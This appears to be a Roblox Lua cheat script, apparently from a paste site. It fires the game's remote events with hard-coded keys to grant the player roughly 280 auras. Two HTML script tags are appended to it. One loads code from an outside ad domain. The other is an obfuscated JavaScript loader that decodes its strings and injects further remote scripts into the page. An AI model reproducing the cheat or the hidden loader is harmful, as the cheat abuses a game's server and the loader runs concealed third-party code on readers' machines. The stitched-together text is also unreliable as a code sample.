local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Remotes = ReplicatedStorage:WaitForChild("Remotes")

local auras = {
"abundance",
"adrenaline",
"ai",
"air",
"alien",
"amber",
"angel",
"apocalypse",
"apex",
"apollo",
"aquatic",
"ares",
"aurora borealis",
"awesome",
"balance",
"bat",
"batman",
"beacon",
"big bang",
"black hole",
"blossom",
"blizzard",
"boss",
"breeze",
"brilliant",
"brokie",
"buddha",
"bubbles",
"butterfly",
"calm",
"chaos",
"chemistry",
"chained",
"challenge",
"cloud",
"coal",
"cosmic",
"courage",
"crab",
"crimson king",
"crown",
"crust",
"cryogen",
"cryptic",
"cursed",
"cycle",
"daisy",
"dark angel",
"dark matter",
"darkness",
"darth",
"death",
"deception",
"demon",
"desert",
"devil",
"disco",
"divine",
"doom",
"dragon",
"dream",
"drought",
"dubstep",
"dust",
"earth",
"eclipse",
"emperor",
"ender",
"energy",
"equinox",
"eternal",
"eternal flame",
"eruption",
"euphoria",
"explosive",
"fairy",
"fermotic",
"fire",
"firefly",
"fission",
"flex",
"floral",
"freedom",
"frostbite",
"future",
"galaxy",
"gem",
"geometry",
"geyser",
"giga",
"glacier",
"glitter",
"god",
"gold",
"graveyard",
"gravity",
"harp",
"hax",
"heaven",
"hellbent",
"hidden",
"hip hop",
"hunted",
"hurricane",
"hyper",
"hypnotic",
"ice",
"infinite",
"infinite vortex",
"inspiration",
"itadori",
"jackpot",
"jedi",
"joker",
"joy",
"karma",
"knight",
"ko",
"lava",
"life",
"lightning",
"love",
"luck",
"luxury",
"macabre",
"magic",
"magma",
"magnetic",
"medusa",
"mermaid",
"meteor",
"meteor shower",
"mlg",
"monk",
"moon",
"mystic",
"nature",
"nebula",
"necromancer",
"night",
"nightmare",
"ninja",
"noob",
"north star",
"nuclear",
"null",
"ocean",
"ominous",
"omniscient",
"part",
"past",
"peace",
"perfection",
"pheonix",
"phonk",
"pirate",
"planet",
"plant",
"plasma",
"platinum",
"portal",
"poseidon",
"power",
"prism",
"pulse",
"pure",
"quasar",
"quartz",
"radioactive",
"radiance",
"rage",
"rain",
"rainbow",
"raven",
"reaper",
"relativity",
"revenge",
"rift",
"ring of fire",
"robot",
"rocket",
"rose",
"royalty",
"ruby",
"sand",
"sandstorm",
"science",
"serenity",
"shadow",
"shimmer",
"singularity",
"sinister",
"sith",
"sky",
"sleep",
"snow",
"solar wind",
"sorcerer",
"space",
"spectre",
"speed",
"sphinx",
"spirit",
"spring",
"star",
"starlight",
"storm",
"stone",
"superhero",
"supervillain",
"super",
"supreme",
"supernova",
"superb",
"swamp",
"synthwave",
"tacos",
"techtronic",
"tesla",
"the only",
"third eye",
"time",
"tornado",
"toxic",
"tranquility",
"treasure",
"tree",
"trident",
"troll",
"tsunami",
"twilight",
"ufo",
"unity",
"vengeance",
"vibrance",
"vision",
"void",
"volcano",
"vortex",
"water",
"waterfall",
"wealth",
"werewolf",
"wicked",
"wildfire",
"wind",
"wonder",
"wraith",
"yoda",
"ying yang",
"zen",
"zeus",
"???",
"darth",
"equinox",
"giga",
"harp",
"itadori",
"jedi",
"joker",
"karma",
"medusa",
"mlg",
"singularity",
"sith",
"sphinx",
"yoda",
"matrix",
"zodiac",
"dutchman",
"fear",
"tropical",
"constellation",
"blackout",
}

-- Function to activate an aura
local function ActivateAura(auraName)
    -- Ensure the auraName is not empty
    if auraName == "" then
        return
    end

    -- Craft the aura
    Remotes:WaitForChild("NewCraft"):FireServer()

    -- Define the arguments for each action with specific indexing
    local addArgs = { [1] = auraName, [2] = "EEOQRFIWGEW!@#$@(#WRUREFJIGERJNPWQDLP#(!!!!" }
    local equipArgs = { [1] = auraName, [2] = "1" }
    local setAsyncArgs = { [1] = auraName, [2] = "howdytherehowareyoudoinglolidk1243" }

    -- Add the aura
    Remotes:WaitForChild("ADDAURA"):FireServer(unpack(addArgs))

    -- Equip the aura
    Remotes:WaitForChild("Equip_AURA"):FireServer(unpack(equipArgs))

    -- Set the aura's async value
    Remotes:WaitForChild("Set_ASYNC"):FireServer(unpack(setAsyncArgs))
end

-- Activate all auras
for i, auraName in ipairs(auras) do
    ActivateAura(auraName)
end<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://inklinkor.com/tag.min.js',5190944,document.body||document.documentElement)</script>
<script type="text/javascript" data-cfasync="false">
/*<![CDATA[/* */
(function(){var cc9caa9538013591383a887008fbd98f="EammMLe2T0za5K3b5vmhewHVz2XMF2fC_NA5WQbxMKi47Eh-YBNwniKUcHBKWbbpSpaPBfPvWh1xs6w4wA";var b=['wpjChEbCgjBpWw==','w7J3wod8wr3DtMKXNcKNw4bDtMKYwr7CmwISwoVuw5FPw5nCpR7CihvCg8OhVScGEGl4QcKowrPCnmvDjsK2wpbCgMOdZsONGxTDvg==','w5vDrAkiY8OiDcK7w4ZRwr0h','w5HDjkg=','wrtgwpTCvmnDrw==','RsK1XcO9eVcqLg==','F0rDr8OXwqDCmcKYw5zCp8KYXMOjGFBEwq3CjMKidsK4w5dLwpYvB27Dq8O/E8OZwpB/eQ5WwoHCphTDiynDvA==','V8KGwpMBfcKiwq/DolhTGw==','U8OnwottLEwgwpYGwozDkMKC','w6RFw5tQw5RyLsOYJSo=','V8KGwpkTesKIwpjDp1pXEGHCnQ==','w6NUw450Pw==','wrhFf0zDpXp0w4TDpH3Cug4=','MMOew4wIwrDCmCsD','wpI/DMK8','w7JIw4dvMgnCvsOmZRjClkfCrSQ=','wqtPe2TDpmxtw63Dq3DCrD4oc3EkJSPCncOr','w6ZCw5F7KQHCr8OEczrCt1TCnQ==','BA/DssOJw7DDicKQw57DvsOHFMK6C1MBwqbCkcKlLcK/w55Uw5YpCizDtsK0DcKF','bsOgAls=','CzHCuVHDl8KUw7pPL2x5w4bCg8O5wqo=','wqkgAMK5PcKBw4TCnQ==','PcO/w7vDvsK5wr0=','wqlnwo/CtVnDpsKrw7sY','wqfDtsO7w5wKEQ==','c8KVRRHDs2A=','PMOPw54ZwrbDjnA=','w7Afw7/CmGoJb08XUcKdwpDCj8KowqfChWM3NcO2JkBFNcOjw6jCkBE='];(function(a,c){var d=function(g){while(--g){a['push'](a['shift']());}};d(++c);}(b,0x11a));var d=function(a,c){a=a-0x0;var e=b[a];if(d['xIEHsg']===undefined){(function(){var h;try{var j=Function('return (function() '+'{}.constructor("return this")( )'+');');h=j();}catch(k){h=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';h['atob']||(h['atob']=function(l){var m=String(l)['replace'](/=+$/,'');var n='';for(var o=0x0,p,q,r=0x0;q=m['charAt'](r++);~q&&(p=o%0x4?p*0x40+q:q,o++%0x4)?n+=String['fromCharCode'](0xff&p>>(-0x2*o&0x6)):0x0){q=i['indexOf'](q);}return n;});}());var g=function(h,l){var m=[],n=0x0,o,p='',q='';h=atob(h);for(var t=0x0,u=h['length'];t<u;t++){q+='%'+('00'+h['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);}h=decodeURIComponent(q);var r;for(r=0x0;r<0x100;r++){m[r]=r;}for(r=0x0;r<0x100;r++){n=(n+m[r]+l['charCodeAt'](r%l['length']))%0x100;o=m[r];m[r]=m[n];m[n]=o;}r=0x0;n=0x0;for(var v=0x0;v<h['length'];v++){r=(r+0x1)%0x100;n=(n+m[r])%0x100;o=m[r];m[r]=m[n];m[n]=o;p+=String['fromCharCode'](h['charCodeAt'](v)^m[(m[r]+m[n])%0x100]);}return p;};d['fXyPYe']=g;d['mVUyRF']={};d['xIEHsg']=!![];}var f=d['mVUyRF'][a];if(f===undefined){if(d['mDdwKo']===undefined){d['mDdwKo']=!![];}e=d['fXyPYe'](e,c);d['mVUyRF'][a]=e;}else{e=f;}return e;};var o=window;o[d('0xc','gl^R')]=[[d('0x2','KMs('),0x253a23],[d('0x17','[U*N'),0x0],[d('0xd','c!ND'),'0'],[d('0x0','nH!f'),0x0],[d('0x18','92Bp'),![]],[d('0xf','c!ND'),0x0],[d('0xa','cJFl'),!0x0]];var a=[d('0x1b','[oG@'),d('0x4','M^%E'),d('0x19','@8Ad'),d('0x10','M^%E')],r=0x0,z,c=function(){if(!a[r])return;z=o[d('0x3',')C#$')][d('0x8','by3S')](d('0x16','cl]A'));z[d('0x11','W0j2')]=d('0x12','9jQO');z[d('0x9','c!ND')]=!0x0;var e=o[d('0x13','gl^R')][d('0xe','cJFl')](d('0x14','ezaj'))[0x0];z[d('0x1','Bfv(')]=d('0xb','92Bp')+a[r];z[d('0x5','by3S')]=d('0x15','KMs(');z[d('0x1a','z!97')]=function(){r++;c();};e[d('0x7','p]mj')][d('0x6','g&fx')](z,e);};c();})();
/*]]>/* */
</script>
